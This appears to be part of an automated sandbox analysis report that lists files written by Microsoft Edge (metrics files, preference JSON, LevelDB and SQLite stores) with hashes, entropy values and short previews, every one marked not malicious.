                                                                                                                                                                                                                                                                                                                  Preview:...@..@...@.....C.].....@..................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".upshyv20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./..................... ..<.....w..U?:K.7DD._.....W6L..].>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHom
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3553968406659012
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:biUXhV0xosU8xCe+JKlkQuMRxCb8ZXfgYJ0IJpP0KLsyW1L7Fx6:bFRqxosU8xWMk8xVZ4YWI30otWn
                                                                                                                                                                                                                                                                                                                  MD5:CFAB81B800EDABACBF6CB61AA78D5258
                                                                                                                                                                                                                                                                                                                  SHA1:2730D4DA1BE7238D701DC84EB708A064B8D1CF27
                                                                                                                                                                                                                                                                                                                  SHA-256:452A5479B9A2E03612576C30D30E6F51F51274CD30EF576EA1E71D20C657376F
                                                                                                                                                                                                                                                                                                                  SHA-512:EC188B0EE4D3DAABC26799B34EE471BEE988BDD7CEB011ED7DF3D4CF26F98932BBBB4B70DC2B7FD4DF9A3981B3CE22F4B5BE4A0DB97514D526E521575EFB2EC6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...@.@...@..............@...................................`... ...i.y.........CrashpadMetrics.....i.y..Yd.h.......A.......e............,.........W.......................W....................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.UsedPct.......h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.........A............................E.[4.f..................E.[4.f.................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.Errors............i.y..Yd.........A..................._..-`....h-.....................h-....................Crashpad.HandlerLifetimeMilestone.......0...i.y.[".........................................i.y..Yd.@.......C...........................VM....],................WM....],................Stability.BrowserExitCodes...... ...i.y......VM....],........H...i.y.1U!S............................................................ ...i.y...0...WM....],........................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.187800137618523
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:FiWWltl/9eIth1iUniIWpCWjwBVP/Sh/JzvLi2RRIxINXj1jtll:o1/tdiKgjwBVsJDG2Yq
                                                                                                                                                                                                                                                                                                                  MD5:514660B3F2F17478F22E1034032A5A6D
                                                                                                                                                                                                                                                                                                                  SHA1:C84833468EC2B6E3483F2948E1C1F56D86EEE70B
                                                                                                                                                                                                                                                                                                                  SHA-256:A72BFD07166FB837FBBD5182CC65AF6DF9026C8EC08F5F557F6C6F126119BDE4
                                                                                                                                                                                                                                                                                                                  SHA-512:105C983FCC30083842158238E500AE930159E91E115BB008B5AFB67000FD6C51F06760A87F19B9832ACF51E878B8C48AD92184805F01F83D6AB8251935280B13
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:sdPC......................5.y&.K.?...."DmHYrCHlc5lFyRGUq62R3qS1k3Ui6rBGmzkDnx9Vsbw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (18011), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):18012
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.458063678870864
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:sVPLAJuazJ0HX9iiUTPhJwp+Npc6XXupUPQw56:s1cJuHHXgap+Npc6X+pUYv
                                                                                                                                                                                                                                                                                                                  MD5:6BDED809262AE237ADCE78C165BD3F42
                                                                                                                                                                                                                                                                                                                  SHA1:8A2C765FB25362CBE88F1937E56DDF78F00F7A0A
                                                                                                                                                                                                                                                                                                                  SHA-256:6E39BC1717D0D5E8F11CB40C8E1AF2805A3B2D435F2562933FFF10729CBBD09E
                                                                                                                                                                                                                                                                                                                  SHA-512:DDB452C6DBFF17CDBE8F1DA2B4CC135AB9827489BB57C86A6BAC887ADC67C63C213C742E96E58D94B347EF33568619B9F04FDADD6B44E38D0A6F94B3B29C904D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380890357258526","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):39660
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.562280411723996
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Hccl1w7pLGLhFzWPWYfkg8F1+UoAYDCx9Tuqh0VfUC9xbog/OVr0xKw/drwiZmzL:Hccl18chFzWPWYfkgu1jaS0xl/miZmNV
                                                                                                                                                                                                                                                                                                                  MD5:062CECB04887E8ACCFB580C361D84725
                                                                                                                                                                                                                                                                                                                  SHA1:A3ABA7DC53A2FE610C15B7DC8071C770A8CA10F4
                                                                                                                                                                                                                                                                                                                  SHA-256:D6D8538293D46544DC51D53E17D55D48B29A0BF2B2D19AA773800CCFD7DD4FA8
                                                                                                                                                                                                                                                                                                                  SHA-512:935E25E086BDC8EA55C4327CD2D2C6C52D0C16028CCCD36C167E462691261F9A8B32ACCBFBB0E8B6F92A306DE034CD7B1C9FAF3DBA5306C33EB10EB1A58378AA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380890356794370","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380890356794370","location":5,"ma
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17246), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):17247
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.419227772625075
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:sVPLAJuazJ0HXDTPhJwp+Npc6XXupUPQwL6:s1cJuHHXAp+Npc6X+pUYx
                                                                                                                                                                                                                                                                                                                  MD5:82BACBDE116741A80CA89F72ADC00B42
                                                                                                                                                                                                                                                                                                                  SHA1:767C94C85828D726F2CD4F473408BDA44A1A6D97
                                                                                                                                                                                                                                                                                                                  SHA-256:C568AE8C195D7A032594BAA11056680AE7DAF6DBEA1EFCF89A7D02E179C16228
                                                                                                                                                                                                                                                                                                                  SHA-512:9F4DBCFEF03482FFDF84FF36FD5372967FEF8B0852B7543BE4549A7467554A87DE62EAA209A8990650E4D3F9CB94347BB27E29FE7221998F62F3289F73C8173A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380890357258526","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17901), with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):17902
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.460193172686079
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:sVPLAJuazJ0HX9iiUTPhJwp+Npc6XXupUPQw76:s1cJuHHXgap+Npc6X+pUYF
                                                                                                                                                                                                                                                                                                                  MD5:4DA573BFF0EDD589CED5B9F2D5983ADD
                                                                                                                                                                                                                                                                                                                  SHA1:7856485D49B90531E8FBE8C136B4F53FC7CE2E57
                                                                                                                                                                                                                                                                                                                  SHA-256:847E3FFBF88E66D1D420730F433A1E6435ABAA59A7DEAA35D43EBB17EAFFC9B6
                                                                                                                                                                                                                                                                                                                  SHA-512:1FFCD0C802DE37C468FD05840C85178F053CE94DD084F7DB58E091A039A849E61A212D9A14A9F5EEC4E43A711864C45EDC7E9DF8CD30EDCB9A0880A7D4128663
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380890357258526","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):37816
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5559603273812055
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Hccl1w7pLGLhFzWPWYf3g8F1+UoAYDCx9Tuqh0VfUC9xbog/OVZKw/drwiZmeDda:Hccl18chFzWPWYf3gu1ja4l/miZm8FDs
                                                                                                                                                                                                                                                                                                                  MD5:4A4482A8F16647EA916FD7E38DD50CAE
                                                                                                                                                                                                                                                                                                                  SHA1:5178FB100D62071AD1B91BD3B3114C0C2C3725D0
                                                                                                                                                                                                                                                                                                                  SHA-256:05C75DB1D862E0205729351EC463F4A4896520D880F775E0A4CCF259BC252C56
                                                                                                                                                                                                                                                                                                                  SHA-512:D703D22FAB8E3DA43995BCF1DE2F37018BB87B43986B2D0FF411C939B58F34DF7F4AEF8578463BB4ACD9CD5DD340E29836BA8B84A7D54563A7FE61F9B4E41D39
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380890356794370","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380890356794370","location":5,"ma
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):1695826
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.0411338386484505
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:NPfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:NPfZ/mS5
                                                                                                                                                                                                                                                                                                                  MD5:B910C3C198038BFA334DA368170D41C5
                                                                                                                                                                                                                                                                                                                  SHA1:FE0A22CE77E5E6B53A3ADA6A23DB2679319E522E
                                                                                                                                                                                                                                                                                                                  SHA-256:9626D3B1A34808F4EC26F4763D7DBA4940A982515C97107A01A761E006AD7896
                                                                                                                                                                                                                                                                                                                  SHA-512:7B8207B8729F6B27B2E6D0773D399B5C8450968DB62A261DE3D81586F5C83DC699846C144B8C3506AB4A0524B0C927D74794A2D801938CAEE09BA53E0DE3D2E6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7.*.13380890361135361.$QUERY:edge_hub_apps_manifest_gz4.7.*..[{"name":"edge_hub_apps_manifest_gz","url":"https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline","version":{"major":4,"minor":7,"patch":107},"hash":"Qoxdh2pZS19o99emYo77uFsfzxtXVDB75kV6eln53YE=","size":1682291}]Zh.X.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13380890361136749.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}]=_.../..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivileged
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):293
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.089965748757019
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJJWDV0q1wkn23oH+Tcwt9Eh1ZB2KLl5bJJmAq2Pwkn23oH+Tcwt9Eh1tIFUv:7vGG1fYeb9Eh1ZFLjPvYfYeb9Eh16FUv
                                                                                                                                                                                                                                                                                                                  MD5:E27F23804C3F579FB4ABA3540E0BDEFC
                                                                                                                                                                                                                                                                                                                  SHA1:1F8AD9965AF79CB92829AC7F31861FC11086F5B8
                                                                                                                                                                                                                                                                                                                  SHA-256:CAA346565D9667AACDBE2850C150EDB1C0FC48E31D24A11639D4F8E7EFB478C0
                                                                                                                                                                                                                                                                                                                  SHA-512:E1A3BD5B5355AD3461F04DCFFEEC0E1D479E2D8F7EEE1C4AF6A9BC38592BADF908BF8A5DA6BD600CCA8C5751D57227EBC4A2B9C18927821850E1B2BFD150823D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:20.175 2260 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2025/01/09-04:59:20.351 2260 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3202460253800455
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                                                                                                                                                                                  MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                                                                                                                                                                                  SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                                                                                                                                                                                  SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                                                                                                                                                                                  SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4619790229804566
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu4i:TouQq3qh7z3bY2LNW9WMcUvBu4i
                                                                                                                                                                                                                                                                                                                  MD5:B767720DF4DF47FF652DE6AA939B0EBA
                                                                                                                                                                                                                                                                                                                  SHA1:5701CFF221B8D8801D3570A267C17F7E392ACDBF
                                                                                                                                                                                                                                                                                                                  SHA-256:BC362DBCF0645C2897DC106A6FD5B3B9BEA24922B35C22E5FDA1AF71892061F7
                                                                                                                                                                                                                                                                                                                  SHA-512:34FED2BBEE16C914C8E724B19D6E3A2BCEA3C1432E02322DFC171F977792130BA50E247594CDE0CFAB7004AFFF16AD21083D505C522C46686D462FEA770AA018
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
